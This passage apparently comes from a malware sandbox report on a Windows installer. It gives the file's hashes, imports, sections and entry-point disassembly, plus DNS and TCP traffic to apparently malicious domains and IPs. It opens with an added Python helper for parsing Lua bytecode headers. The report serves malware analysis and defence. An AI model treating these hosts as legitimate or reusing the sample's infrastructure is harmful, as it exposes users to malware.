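Every .luac file in the dropped-file list above starts with the same 12-byte Lua 5.1 chunk header (shown as ".LuaQ......." in the Preview column because the leading 0x1B byte is unprintable), followed by the top-level function's source name, which here is a VLC build-tree path. Parsing just that much is enough to confirm they are stock player scripts bundled by the installer rather than something custom. The helper below is an added example, not part of the sandbox report or of the dropped installer; SAMPLE_CHUNK is constructed by hand from the Lua 5.1 chunk layout, and only the embedded path string is taken from the report.

```python
"""Header triage for Lua 5.1 bytecode (.luac) files.

Added example, not the sandbox's own code.  Lua 5.1 chunks begin with
a 12-byte header: "\\x1bLua", version (0x51), format, endianness, and
the sizes of int, size_t, Instruction and lua_Number, plus an
integral-number flag.  The top-level function prototype follows and
its first field is the source name (size_t length, then the string,
NUL included in the length).
"""
import struct

LUA_SIGNATURE = b"\x1bLua"   # 0x1B followed by "Lua"
LUA_51 = 0x51                # version byte; prints as "Q" in the report's preview


def is_lua_chunk(data: bytes) -> bool:
    return len(data) >= 12 and data[:4] == LUA_SIGNATURE


def parse_lua51_header(data: bytes) -> dict:
    """Return the 12-byte chunk header fields, or raise ValueError."""
    if not is_lua_chunk(data):
        raise ValueError("missing \\x1bLua signature")
    version, fmt, little, int_sz, size_t_sz, instr_sz, num_sz, integral = \
        struct.unpack_from("<8B", data, 4)
    if version != LUA_51:
        raise ValueError(f"unsupported Lua version 0x{version:02x}")
    return {
        "version": version,
        "format": fmt,                    # 0 = official format
        "little_endian": bool(little),
        "int_size": int_sz,
        "size_t_size": size_t_sz,
        "instruction_size": instr_sz,
        "number_size": num_sz,
        "integral_numbers": bool(integral),
    }


def source_name(data: bytes) -> str:
    """Extract the top-level function's source name that follows the header."""
    hdr = parse_lua51_header(data)
    order = "<" if hdr["little_endian"] else ">"
    code = {4: "I", 8: "Q"}.get(hdr["size_t_size"])
    if code is None:
        raise ValueError(f"unexpected size_t size {hdr['size_t_size']}")
    off = 12
    (n,) = struct.unpack_from(order + code, data, off)
    off += hdr["size_t_size"]
    if n == 0 or off + n > len(data):
        raise ValueError("truncated or stripped source name")
    raw = data[off:off + n]
    # Lua counts the terminating NUL in the stored length; drop it.
    return raw.rstrip(b"\x00").decode("ascii", errors="replace")


def build_chunk(source: str) -> bytes:
    """Construct a minimal chunk (header + source name) for offline testing."""
    # format 0, little-endian, int=4, size_t=4, Instruction=4, lua_Number=8, non-integral
    header = LUA_SIGNATURE + bytes([LUA_51, 0, 1, 4, 4, 4, 8, 0])
    name = source.encode("ascii") + b"\x00"
    # A real chunk continues with line info, code and constants; zero padding stands in.
    return header + struct.pack("<I", len(name)) + name + b"\x00" * 8


# Constructed sample: header built above, path taken from the 02_frenchtv.luac entry.
SAMPLE_PATH = "@../../extras/package/win32/../../../share/lua/meta/art/02_frenchtv.lua"
SAMPLE_CHUNK = build_chunk(SAMPLE_PATH)


def triage(data: bytes) -> dict:
    """Summarise what an analyst wants from one dropped .luac file."""
    hdr = parse_lua51_header(data)
    name = source_name(data)
    return {
        "lua_version": f"5.{hdr['version'] & 0x0F}",
        "source": name,
        "vlc_share_path": "/share/lua/" in name,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_CHUNK))
```

The length byte the report shows as "H" (0x48) is the 71-character path plus its NUL terminator, which is why the preview for each file shows a different single printable character at that offset.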

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.696874715069498
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:yevbZfdCqR.exe
File size:798208
MD5:3568d61a49b61ce18bd6093748ffd32a
SHA1:0f6c4618eb4fca4972869a56bf6d8b020e1440f8
SHA256:af350212764e6304bf417e81cf0009b494119670e4bc1b187cd79cf4c487c7b6
SHA512:5c0129297fe07f919fe228633e193f56167e4f92815aa2cb1b9749ff14f377ec4d5c0414dffc733cbdc0b448e4552e06a527a481a144cd3af413c77fe2937cde
SSDEEP:12288:VoyNaVHKFOOVEWqRZHxv+OeO+OeNhBBhhBBX3rjISihqxk3tkw30cHTnQdncOVE4:VoIalKcf30mhJ9TnJNLTF8fmNLa
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$>n.`_.^`_.^`_.^t4._u_.^t4._._.^t4._x_.^.0._D_.^...^d_.^k0._._.^k0._q_.^k0._y_.^t4._g_.^`_.^._.^.0._{_.^.0.^a_.^.0._a_.^Rich`_.

File Icon

Icon Hash:00828e8e8686b000

General

Entrypoint:0x442e85
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x60CC7128 [Fri Jun 18 10:10:48 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:146d9834dca937c5740063d6c887d411
Instruction
call 00007F5F34E19D00h
jmp 00007F5F34E196AFh
int3
jmp 00007F5F34E49F46h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004942E0h
mov dword ptr [ecx], 004942D8h
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F5F34E1980Fh
push 004B52A4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F5F34E3CB90h
int3
int3
int3
int3
int3
int3
int3
push 00466090h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [004B801Ch]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
mov ecx, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
push ebp
mov ebp, esp
and dword ptr [004BC99Ch], 00000000h
sub esp, 24h
or dword ptr [004B8010h], 01h
push 0000000Ah
call 00007F5F34E64664h
test eax, eax
je 00007F5F34E199DFh
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb75c0          0x50          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xbf000          0x1e8         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xc0000          0x781c        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xad740          0x38          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0xad830          0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xad778          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x94000          0x1c0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type                             Entropy        Characteristics
.text   0x1000           0x923a4       0x92400   False     0.462277978098   data                                  6.69759223127  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x94000          0x23fec       0x24000   False     0.447469075521   data                                  5.5021877053   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xb8000          0x6eb0        0x4a00    False     0.156408361486   DOS executable (block device driver)  4.79179597438  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc   0xbf000          0x1e8         0x200     False     0.54296875       data                                  4.7720374017   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xc0000          0x781c        0x7a00    False     0.610207479508   data                                  6.53625267801  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                   Language  Country
RT_MANIFEST  0xbf060  0x188  XML 1.0 document text  English   United States
DLL           Import
KERNEL32.dll  CloseHandle, FindClose, lstrcatA, GetModuleHandleA, GlobalAlloc, lstrcpyA, VerSetConditionMask, GetModuleHandleW, WideCharToMultiByte, VerifyVersionInfoW, GetSystemTimeAsFileTime, IsWow64Process, GetComputerNameA, GetProcAddress, HeapFree, lstrlenA, LoadLibraryA, HeapAlloc, lstrcpynA, GetProcessHeap, GetLastError, CreateFileW, InitializeSListHead, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetCurrentProcess, TerminateProcess, FormatMessageW, SetCurrentDirectoryW, GetCurrentDirectoryW, CreateDirectoryW, DeleteFileW, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, GetFileInformationByHandle, SetEndOfFile, SetFilePointerEx, SetLastError, MultiByteToWideChar, QueryPerformanceFrequency, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, DecodePointer, GetCPInfo, LCMapStringW, GetLocaleInfoW, GetStringTypeW, GetCurrentThread, GetThreadTimes, RtlUnwind, InterlockedPushEntrySList, RaiseException, FreeLibrary, LoadLibraryExW, GetFileType, ExitProcess, GetModuleHandleExW, SetEnvironmentVariableW, GetStdHandle, GetModuleFileNameW, WriteConsoleW, GetConsoleMode, ReadConsoleW, GetConsoleOutputCP, SetStdHandle, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, FlushFileBuffers, HeapReAlloc, OutputDebugStringW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapSize, WriteFile, AreFileApisANSI, ReadFile, SetEvent, ResetEvent, WaitForSingleObjectEx
USER32.dll    CharToOemA, CharNextA
ADVAPI32.dll  CryptGenRandom, CryptAcquireContextA, CryptReleaseContext, ConvertSidToStringSidA, LookupAccountNameA
Language of compilation system  Country where language is spoken  Map
English                         United States

Network Behavior

Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jun 23, 2021 22:22:12.758951902 CEST  49734        80         192.168.2.4     136.144.41.133
Jun 23, 2021 22:22:12.807333946 CEST  80           49734      136.144.41.133  192.168.2.4
Jun 23, 2021 22:22:12.807477951 CEST  49734        80         192.168.2.4     136.144.41.133
Jun 23, 2021 22:22:12.808789015 CEST  49734        80         192.168.2.4     136.144.41.133
Jun 23, 2021 22:22:12.855308056 CEST  80           49734      136.144.41.133  192.168.2.4
Jun 23, 2021 22:22:12.857131958 CEST  80           49734      136.144.41.133  192.168.2.4
Jun 23, 2021 22:22:12.898231983 CEST  49734        80         192.168.2.4     136.144.41.133
Jun 23, 2021 22:22:12.941346884 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:12.989520073 CEST  80           49735      136.144.41.152  192.168.2.4
Jun 23, 2021 22:22:12.989677906 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:12.991138935 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:12.991163015 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:13.038400888 CEST  80           49735      136.144.41.152  192.168.2.4
Jun 23, 2021 22:22:13.187236071 CEST  80           49735      136.144.41.152  192.168.2.4
Jun 23, 2021 22:22:13.242085934 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:13.319396019 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:13.319448948 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:13.372992039 CEST  80           49735      136.144.41.152  192.168.2.4
Jun 23, 2021 22:22:13.550034046 CEST  80           49735      136.144.41.152  192.168.2.4
Jun 23, 2021 22:22:13.601419926 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:13.692172050 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:13.692251921 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:13.744101048 CEST  80           49735      136.144.41.152  192.168.2.4
Jun 23, 2021 22:22:13.886945963 CEST  80           49735      136.144.41.152  192.168.2.4
Jun 23, 2021 22:22:13.929610014 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:14.034775019 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:14.034848928 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:14.087647915 CEST  80           49735      136.144.41.152  192.168.2.4
Jun 23, 2021 22:22:14.263699055 CEST  80           49735      136.144.41.152  192.168.2.4
Jun 23, 2021 22:22:14.304601908 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:14.394797087 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:14.394851923 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:14.454699039 CEST  80           49735      136.144.41.152  192.168.2.4
Jun 23, 2021 22:22:14.611418962 CEST  80           49735      136.144.41.152  192.168.2.4
Jun 23, 2021 22:22:14.664123058 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:14.742743015 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:14.743294954 CEST  49735        80         192.168.2.4     136.144.41.152
Jun 23, 2021 22:22:14.800044060 CEST  80           49735      136.144.41.152  192.168.2.4
Jun 23, 2021 22:22:14.979079008 CEST  80           49735      136.144.41.152  192.168.2.4
Jun 23, 2021 22:22:14.979101896 CEST  80           49735      136.144.41.152  192.168.2.4
Jun 23, 2021 22:22:14.979311943 CEST  49735        80         192.168.2.4     136.144.41.152
                                                                                                                                                                                      Jun 23, 2021 22:22:15.170106888 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.170304060 CEST4973980192.168.2.4185.20.227.194
                                                                                                                                                                                      Jun 23, 2021 22:22:15.171051979 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.220037937 CEST8049740136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.220165968 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.220931053 CEST8049738136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.221046925 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.235958099 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.236948013 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.285470009 CEST8049740136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.286046028 CEST8049740136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.287184000 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.288018942 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.293503046 CEST8049738136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.293535948 CEST8049738136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.293618917 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.294195890 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.337755919 CEST4974180192.168.2.4212.80.219.75
                                                                                                                                                                                      Jun 23, 2021 22:22:15.338098049 CEST8049740136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.338936090 CEST8049740136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.339452982 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.340239048 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.345277071 CEST4974280192.168.2.4104.21.65.45
                                                                                                                                                                                      Jun 23, 2021 22:22:15.346956015 CEST8049738136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.347373009 CEST8049738136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.347501040 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.348433018 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.349195004 CEST4974380192.168.2.489.221.213.3
                                                                                                                                                                                      Jun 23, 2021 22:22:15.350653887 CEST4974480192.168.2.4162.159.134.233
                                                                                                                                                                                      Jun 23, 2021 22:22:15.350815058 CEST4974580192.168.2.4162.159.134.233
                                                                                                                                                                                      Jun 23, 2021 22:22:15.383908987 CEST8049741212.80.219.75192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.384016991 CEST4974180192.168.2.4212.80.219.75
                                                                                                                                                                                      Jun 23, 2021 22:22:15.384155035 CEST8049742104.21.65.45192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.384438992 CEST4974180192.168.2.4212.80.219.75
                                                                                                                                                                                      Jun 23, 2021 22:22:15.384495974 CEST4974280192.168.2.4104.21.65.45
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389136076 CEST4974280192.168.2.4104.21.65.45
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389381886 CEST8049740136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389506102 CEST8049744162.159.134.233192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389631987 CEST8049745162.159.134.233192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389739990 CEST4974480192.168.2.4162.159.134.233
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389796019 CEST8049740136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389863014 CEST4974580192.168.2.4162.159.134.233
                                                                                                                                                                                      Jun 23, 2021 22:22:15.389868021 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.390624046 CEST4974480192.168.2.4162.159.134.233
                                                                                                                                                                                      Jun 23, 2021 22:22:15.390717030 CEST4974580192.168.2.4162.159.134.233
                                                                                                                                                                                      Jun 23, 2021 22:22:15.391261101 CEST4974080192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.400698900 CEST8049738136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.400835037 CEST8049738136.144.41.133192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.401350975 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.401511908 CEST804974389.221.213.3192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.401654005 CEST4974380192.168.2.489.221.213.3
                                                                                                                                                                                      Jun 23, 2021 22:22:15.403125048 CEST4974380192.168.2.489.221.213.3
                                                                                                                                                                                      Jun 23, 2021 22:22:15.403331995 CEST4973880192.168.2.4136.144.41.133
                                                                                                                                                                                      Jun 23, 2021 22:22:15.428740978 CEST8049742104.21.65.45192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.428786993 CEST8049742104.21.65.45192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.428870916 CEST4974280192.168.2.4104.21.65.45
                                                                                                                                                                                      Jun 23, 2021 22:22:15.428987980 CEST8049742104.21.65.45192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.429785013 CEST8049744162.159.134.233192.168.2.4
                                                                                                                                                                                      Jun 23, 2021 22:22:15.429816961 CEST8049744162.159.134.233192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 23, 2021 22:22:15.270683050 CEST | 192.168.2.4 | 8.8.8.8 | 0xcf30 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:15.272809982 CEST | 192.168.2.4 | 8.8.8.8 | 0x9d8 | Standard query (0) | freeprivacytoolsforyou.xyz | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:15.277285099 CEST | 192.168.2.4 | 8.8.8.8 | 0xbdb | Standard query (0) | jom.diregame.live | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:15.279337883 CEST | 192.168.2.4 | 8.8.8.8 | 0xb872 | Standard query (0) | flamkravmaga.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:15.281922102 CEST | 192.168.2.4 | 8.8.8.8 | 0xf06a | Standard query (0) | nicepricingsaleregistration.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:15.282421112 CEST | 192.168.2.4 | 8.8.8.8 | 0x70ca | Standard query (0) | pp.exe | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:16.290548086 CEST | 192.168.2.4 | 8.8.8.8 | 0xb872 | Standard query (0) | flamkravmaga.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:16.641901970 CEST | 192.168.2.4 | 8.8.8.8 | 0xd2f2 | Standard query (0) | d.dirdgame.live | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:17.363445044 CEST | 192.168.2.4 | 8.8.8.8 | 0xb872 | Standard query (0) | flamkravmaga.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:19.382400990 CEST | 192.168.2.4 | 8.8.8.8 | 0xb872 | Standard query (0) | flamkravmaga.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:20.565454006 CEST | 192.168.2.4 | 8.8.8.8 | 0xb97b | Standard query (0) | flamkravmaga.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:21.571854115 CEST | 192.168.2.4 | 8.8.8.8 | 0xb97b | Standard query (0) | flamkravmaga.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:22.574953079 CEST | 192.168.2.4 | 8.8.8.8 | 0xb97b | Standard query (0) | flamkravmaga.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:24.622595072 CEST | 192.168.2.4 | 8.8.8.8 | 0xb97b | Standard query (0) | flamkravmaga.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:39.232224941 CEST | 192.168.2.4 | 8.8.8.8 | 0xd6ab | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:51.609744072 CEST | 192.168.2.4 | 8.8.8.8 | 0xdf72 | Standard query (0) | www.facebook.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:54.425018072 CEST | 192.168.2.4 | 8.8.8.8 | 0x7424 | Standard query (0) | sergeevih43.tumblr.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:55.189569950 CEST | 192.168.2.4 | 8.8.8.8 | 0xf635 | Standard query (0) | www.browzar.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:58.283819914 CEST | 192.168.2.4 | 8.8.8.8 | 0x4267 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:23:02.201591015 CEST | 192.168.2.4 | 8.8.8.8 | 0xabd7 | Standard query (0) | sergeevih43.tumblr.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:23:03.275805950 CEST | 192.168.2.4 | 8.8.8.8 | 0x64a9 | Standard query (0) | iplis.ru | A (IP address) | IN (0x0001)
Jun 23, 2021 22:23:03.970230103 CEST | 192.168.2.4 | 8.8.8.8 | 0xfba | Standard query (0) | www.facebook.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:23:08.828871965 CEST | 192.168.2.4 | 8.8.8.8 | 0xe5a1 | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)
Jun 23, 2021 22:23:12.174588919 CEST | 192.168.2.4 | 8.8.8.8 | 0xb4a2 | Standard query (0) | uyg5wye.2ihsfa.com | A (IP address) | IN (0x0001)
Jun 23, 2021 22:23:20.169184923 CEST | 192.168.2.4 | 8.8.8.8 | 0xf5cd | Standard query (0) | g-partners.in | A (IP address) | IN (0x0001)
Jun 23, 2021 22:23:33.160851955 CEST | 192.168.2.4 | 8.8.8.8 | 0x6aa1 | Standard query (0) | g-partners.top | A (IP address) | IN (0x0001)
Jun 23, 2021 22:23:46.861325979 CEST | 192.168.2.4 | 8.8.8.8 | 0x3ba0 | Standard query (0) | email.yg9.me | A (IP address) | IN (0x0001)
Jun 23, 2021 22:23:46.862257957 CEST | 192.168.2.4 | 8.8.8.8 | 0xe18d | Standard query (0) | email.yg9.me | 28 | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 23, 2021 22:22:15.332663059 CEST | 8.8.8.8 | 192.168.2.4 | 0x9d8 | No error (0) | freeprivacytoolsforyou.xyz |  | 212.80.219.75 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:15.342724085 CEST | 8.8.8.8 | 192.168.2.4 | 0x70ca | Name error (3) | pp.exe | none | none | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:15.343401909 CEST | 8.8.8.8 | 192.168.2.4 | 0xbdb | No error (0) | jom.diregame.live |  | 104.21.65.45 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:15.343401909 CEST | 8.8.8.8 | 192.168.2.4 | 0xbdb | No error (0) | jom.diregame.live |  | 172.67.158.82 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:15.346995115 CEST | 8.8.8.8 | 192.168.2.4 | 0xf06a | No error (0) | nicepricingsaleregistration.com |  | 89.221.213.3 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:15.348798990 CEST | 8.8.8.8 | 192.168.2.4 | 0xcf30 | No error (0) | cdn.discordapp.com |  | 162.159.134.233 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:15.348798990 CEST | 8.8.8.8 | 192.168.2.4 | 0xcf30 | No error (0) | cdn.discordapp.com |  | 162.159.133.233 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:15.348798990 CEST | 8.8.8.8 | 192.168.2.4 | 0xcf30 | No error (0) | cdn.discordapp.com |  | 162.159.135.233 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:15.348798990 CEST | 8.8.8.8 | 192.168.2.4 | 0xcf30 | No error (0) | cdn.discordapp.com |  | 162.159.130.233 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:15.348798990 CEST | 8.8.8.8 | 192.168.2.4 | 0xcf30 | No error (0) | cdn.discordapp.com |  | 162.159.129.233 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:16.709765911 CEST | 8.8.8.8 | 192.168.2.4 | 0xd2f2 | No error (0) | d.dirdgame.live |  | 104.21.59.252 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:16.709765911 CEST | 8.8.8.8 | 192.168.2.4 | 0xd2f2 | No error (0) | d.dirdgame.live |  | 172.67.186.79 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:20.329885006 CEST | 8.8.8.8 | 192.168.2.4 | 0xb872 | Server failure (2) | flamkravmaga.com | none | none | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:21.341718912 CEST | 8.8.8.8 | 192.168.2.4 | 0xb872 | Server failure (2) | flamkravmaga.com | none | none | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:22.413284063 CEST | 8.8.8.8 | 192.168.2.4 | 0xb872 | Server failure (2) | flamkravmaga.com | none | none | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:24.433691978 CEST | 8.8.8.8 | 192.168.2.4 | 0xb872 | Server failure (2) | flamkravmaga.com | none | none | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:25.611881971 CEST | 8.8.8.8 | 192.168.2.4 | 0xb97b | Server failure (2) | flamkravmaga.com | none | none | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:25.721184015 CEST | 8.8.8.8 | 192.168.2.4 | 0xb97b | Server failure (2) | flamkravmaga.com | none | none | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:26.735915899 CEST | 8.8.8.8 | 192.168.2.4 | 0xb97b | Server failure (2) | flamkravmaga.com | none | none | A (IP address) | IN (0x0001)
